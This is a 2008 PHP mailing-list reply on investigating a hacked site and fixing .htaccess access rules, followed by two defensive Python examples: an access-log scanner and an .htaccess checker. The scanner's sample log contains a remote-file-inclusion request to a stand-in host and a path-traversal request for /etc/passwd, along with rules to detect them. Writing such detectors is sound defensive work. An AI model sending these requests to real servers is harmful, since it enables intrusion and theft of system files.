NYCPHP Meetup

NYPHP.org

[nycphp-talk] Need some understanding about a hacker attack...

Dan Horning dan.horning at planetnoc.com
Sat Oct 11 10:00:40 EDT 2008


On Sat, 2008-10-11 at 09:42 -0400, David Krings wrote:
> mikesz at qualityadvantages.com wrote:
> > I checked my test system also and when I do a directory the /xml
> > folder, it shows me the content of the folder which is yet another
> > outcome unexpected.
> > 
> 
> There is a setting in the Apache config that prevents the listing of
> directories. In a production system that should always be turned off.
> Also, IIRC you can specify the name of the access file in the config as well, 
> so it may not always be .htaccess, but I cannot think of any plausible reason 
> to change that. But that may be worthwhile to check out.
> 
> Oh, and at your earliest convenience change the hosting company. If they 
> cannot tell you how such a takeover happened then I wonder what they charge 
> you money for. Anyone with a PC can do that type of hosting...

On one hand I can understand how the host wouldn't know exactly how the
files got there - but the file ownership and logs should give much more
information away, and they should know if it was a shell attack, a remote
file inclusion, or any number of common attacks.

From your side, though: are you using a common code base or module that
might be vulnerable, or maybe an old version of now-patched software?
If you are, what I use might be something to look for in a web host - we
use an intrusion detection system that combines mod_security with some
well-written rules, along with some other software that monitors
everything. With that in place, although I'm sure there is still a way
for someone to find a way into your system, it's incredibly less likely,
and the automated attackers would most certainly not work.

To answer your question about the .htaccess file: there is also a
possibility that the host does not have all of the AllowOverride
directives active for your hosting account. In that case some items would
work and others wouldn't.

Next up, the content of your .htaccess. It's probably not what you wanted
to do, and I'm nearly positive that the deny/allow isn't working.
> -Indexes
- turns off directory listings. You may also need to change this to
another name, thus triggering the default not to be shown.
> DirectoryIndex index.php
- that will make index.php the only file that shows up when you visit
http://host/xml/ (correct me if I'm thinking of the other directive; it's
early)
--------------------------------------
> Options -Indexes
> 
> order deny,allow
> 
> <files "*.*">
> Deny from All
> </files>
> 
> <files "*.*">
> Allow from 127.0.0.1 localhost
> </files>

This is a working config for something I have running:
> Options -Indexes
>
> AuthUserFile /pathto/.htpasswd
> AuthType Basic
> AuthName "Staff Only"
> Satisfy Any
>
> <Limit GET POST>
> order deny,allow
> deny from all
> allow from some.ip.add.ress
> require valid-user
> </Limit>

-- 
Dan Horning

American Digital Services - Where you are only limited by imagination.
direct 1-866-493-4218 . main 1-800-863-3854 . fax 1-888-474-6133
dan.horning at planetnoc.com
http://www.americandigitalservices.com
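Dan's point that the logs should show whether it was a shell attack or a remote file inclusion is the kind of check a host (or the site owner, if the access log is readable) can script. The following is an added example, not code from the thread or from American Digital Services: it parses Apache "combined" format lines and flags the signs a reviewer would look for first (a URL passed as a query value, directory traversal in the path, a bare directory request answered with 200, and a scripted user agent). The sample log lines, the IP addresses and the `AUTOMATED_UA` prefix list are constructed for the example; the user-agent list in particular is a hypothetical starting point, not a rule set.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample lines in Apache "combined" log format, written for this
# example and not taken from the thread. 203.0.113.0/24 and 198.51.100.0/24
# are documentation address ranges.
SAMPLE_LOG = """\
203.0.113.5 - - [11/Oct/2008:09:12:01 -0400] "GET /index.php?page=about HTTP/1.1" 200 2311 "-" "Mozilla/5.0"
203.0.113.9 - - [11/Oct/2008:09:12:07 -0400] "GET /index.php?page=http://198.51.100.7/x.txt? HTTP/1.1" 200 512 "-" "libwww-perl/5.805"
203.0.113.9 - - [11/Oct/2008:09:12:09 -0400] "GET /xml/ HTTP/1.1" 200 1840 "-" "libwww-perl/5.805"
198.51.100.22 - - [11/Oct/2008:09:13:40 -0400] "GET /images/..%2F..%2Fetc/passwd HTTP/1.0" 404 210 "-" "curl/7.18.2"
203.0.113.5 - - [11/Oct/2008:09:14:02 -0400] "POST /xml/upload.php HTTP/1.1" 403 199 "-" "Mozilla/5.0"
"""

# One "combined" line: client, identd, user, [timestamp], "request", status,
# size, then optional "referer" and "user-agent".
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: \S+)?" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
    r'(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?'
)

# Hypothetical list of user-agent prefixes that mark scripted clients; tune it
# for your own site rather than treating it as authoritative.
AUTOMATED_UA = ("libwww-perl", "python-urllib", "wget")
REMOTE_SCHEMES = ("http://", "https://", "ftp://")


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["status"] = int(entry["status"])
    entry["ua"] = entry["ua"] or ""
    return entry


def classify(entry):
    """Return the reasons (possibly none) why this request deserves a closer look."""
    reasons = []
    parts = urlsplit(entry["target"])
    path = unquote(parts.path)
    # A full URL in a query value is the classic remote-file-inclusion shape.
    for _, value in parse_qsl(parts.query, keep_blank_values=True):
        if unquote(value).lower().startswith(REMOTE_SCHEMES):
            reasons.append("remote-file-inclusion")
            break
    # Decoded path climbing out of the document root.
    if "../" in path or "..\\" in path:
        reasons.append("path-traversal")
    # A bare directory answered with 200: confirm whether a listing or a
    # DirectoryIndex file was served.
    if entry["method"] == "GET" and path != "/" and path.endswith("/") and entry["status"] == 200:
        reasons.append("bare-directory-200")
    if entry["ua"].lower().startswith(AUTOMATED_UA):
        reasons.append("automated-client")
    return reasons


def scan(log_text):
    """Run every parseable line through classify(); return (ip, target, reasons) for hits."""
    findings = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = classify(entry)
        if reasons:
            findings.append((entry["ip"], entry["target"], reasons))
    return findings


if __name__ == "__main__":
    for ip, target, reasons in scan(SAMPLE_LOG):
        print(f"{ip:15} {', '.join(reasons):45} {target}")
```

Run against a real access log, the interesting output is the first hit per client address combined with the file ownership and mtime of whatever appeared under /xml: the log line whose timestamp matches the file's creation time is usually the request that wrote it.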
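Dan's remark that the host may not have every AllowOverride category enabled, so that "some items would work and others wouldn't", can be checked before a config is uploaded. Below is an added example, not code from the thread: a small .htaccess checker that reads the file, maps each directive to the AllowOverride category it needs (the mapping follows the Apache 2.2 directive reference, trimmed to the directives used in this thread), and also reports unbalanced quotes, unclosed sections and a missing `Options -Indexes`. Both sample inputs are constructed for the example and modelled on the two configs posted above; the stray quote after `.htpasswd` is kept deliberately in the second one so the checker has something to find.

```python
# Which AllowOverride category each directive needs before Apache will honour
# it from an .htaccess file (Apache 2.2 directive reference; trimmed to the
# directives that appear in this thread).
NEEDS = {
    "options": "Options",
    "directoryindex": "Indexes",
    "order": "Limit", "allow": "Limit", "deny": "Limit",
    "limit": "Limit",  # the <Limit> section itself
    "satisfy": "AuthConfig", "authtype": "AuthConfig", "authname": "AuthConfig",
    "authuserfile": "AuthConfig", "require": "AuthConfig",
}

# Constructed input modelled on the poster's .htaccess from the thread.
POSTER_HTACCESS = """\
Options -Indexes

order deny,allow

<files "*.*">
Deny from All
</files>

<files "*.*">
Allow from 127.0.0.1 localhost
</files>
"""

# Constructed input modelled on the working config in the reply; the stray
# quote after .htpasswd is kept on purpose so the checker has something to find.
STAFF_HTACCESS = """\
Options -Indexes

AuthUserFile /pathto/.htpasswd"
AuthType Basic
AuthName "Staff Only"
Satisfy Any

<Limit GET POST>
order deny,allow
deny from all
allow from some.ip.add.ress
require valid-user
</Limit>
"""


def parse_htaccess(text):
    """Return (lineno, kind, name, args) tuples; kind is 'open', 'close' or 'directive'."""
    entries = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        if line.startswith("</"):
            entries.append((n, "close", line[2:].rstrip(">").strip().lower(), ""))
        elif line.startswith("<"):
            name, _, args = line[1:].rstrip(">").partition(" ")
            entries.append((n, "open", name.lower(), args.strip()))
        else:
            name, _, args = line.partition(" ")
            entries.append((n, "directive", name.lower(), args.strip()))
    return entries


def check_htaccess(text, allow_override):
    """Report directives the given AllowOverride value will not honour, plus
    unbalanced quotes, unclosed sections and a missing 'Options -Indexes'."""
    allowed = {word.lower() for word in allow_override.split()}
    findings, stack, indexes_off = [], [], False
    for n, kind, name, args in parse_htaccess(text):
        if kind == "close":
            if stack and stack[-1][1] == name:
                stack.pop()
            else:
                findings.append((n, f"unexpected </{name}>"))
            continue
        if kind == "open":
            stack.append((n, name))
        if args.count('"') % 2:
            findings.append((n, f"{name}: unbalanced quote in arguments"))
        if name == "options" and "-indexes" in args.lower().split():
            indexes_off = True
        need = NEEDS.get(name)
        if need and "all" not in allowed and need.lower() not in allowed:
            findings.append((n, f"{name} needs AllowOverride {need}"))
    for n, name in stack:
        findings.append((n, f"<{name}> never closed"))
    if not indexes_off:
        findings.append((0, "no 'Options -Indexes': directory listings may stay enabled"))
    return findings


if __name__ == "__main__":
    for label, text in (("poster", POSTER_HTACCESS), ("staff", STAFF_HTACCESS)):
        for override in ("AuthConfig FileInfo", "All"):
            print(f"== {label} with AllowOverride {override}")
            for lineno, message in check_htaccess(text, override):
                print(f"  line {lineno}: {message}")
```

The AllowOverride value to pass in is whatever the host has set for the account's directory; if they will not tell you, a directive the checker flags under a guessed value is a good candidate to ask them about.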
